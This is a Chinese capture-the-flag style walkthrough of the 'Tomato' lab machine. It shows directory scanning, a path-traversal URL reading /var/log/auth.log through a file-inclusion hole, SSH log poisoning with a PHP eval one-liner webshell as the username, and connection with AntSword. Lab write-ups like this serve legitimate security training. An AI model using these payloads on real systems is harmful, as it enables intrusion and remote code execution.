当前位置: 首页 > news >正文

Tomato靶场渗透测试

news 2025/7/29 2:33:59

1.扫描靶机地址

可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了

2.打开网站

3.进行目录扫描

dirb    http://172.16.1.113

发现有一个antibot_image目录

4.访问这个目录

可以看到有一个info.php

5.查看页面源代码

可以发现可以进行get传参

6.尝试查看日志文件

http://172.16.1.113/antibot_image/antibots/info.php?image=../../../../../../../var/log/auth.log

可以看到页面上有日志显示 说明存在文件包含漏洞

7.尝试使用ssh进行连接

ssh aaaaaaaaaa@172.16.1.113 -p 2211 

可以看到日志有记录显示

8.尝试写入一句话木马

ssh '<?php @eval($_POST[cmd]); ?>'@172.16.1.113 -p 2211

9.使用蚁剑进行连接

可以连接成功 成功获取webshell


http://www.mrgr.cn/news/19587.html

相关文章:

  • CargosettlementController
  • css虚线边框可以调整间距实现
  • Git代码托管仓库01
  • 【C++基础】构造函数和他的初始化列表
  • PAT甲级(Advanced Level) 1001 A+B Format
  • jmeter使用——接口测试事知识点
  • 海康二次开发学习笔记13-从Group外部输入图像
  • opencv全面详解教程
  • 浅谈人工智能之基于AutoGen Studio+litellm+ollama构建model
  • 2024年【化工自动化控制仪表】考试资料及化工自动化控制仪表找解析
  • Vue2项目搭建:Vue2.7+Vite4+Pinia+TailwindCSS+Prettier+ESLint
  • 云计算之ECS
  • 一招制胜!掌握 Python 中pip的8个必备命令
  • MSP430F149实现0.96寸OLED显示
  • 编码(曼彻斯特编码,4B/5B 编码,8b/10b编码)
  • 解决Pynput不能在Ubuntu22.04上正常使用问题
  • 【LabVIEW学习篇 - 17】:人机交互界面设计01
  • 轻松上手 | 基于RockyLinux 9.4安装部署Zabbix 7.0
  • 2024年最强图纸加密软件大揭秘!图纸加密软件推荐
  • lvs DR模式调试